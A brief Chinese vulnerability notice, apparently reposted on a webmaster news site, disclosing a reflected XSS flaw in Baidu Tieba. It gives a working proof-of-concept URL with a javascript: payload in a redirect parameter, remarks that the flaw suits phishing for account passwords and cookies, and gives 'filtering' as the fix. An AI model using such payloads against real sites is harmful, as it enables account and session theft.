百度贴吧某处反射型XSS漏洞下载

百度贴吧某处反射型XSS漏洞

http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(document.domain)



需要登录才可以触发,用来钓鱼片账号密码和cookie还是很不错的

修复方案:

过滤

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细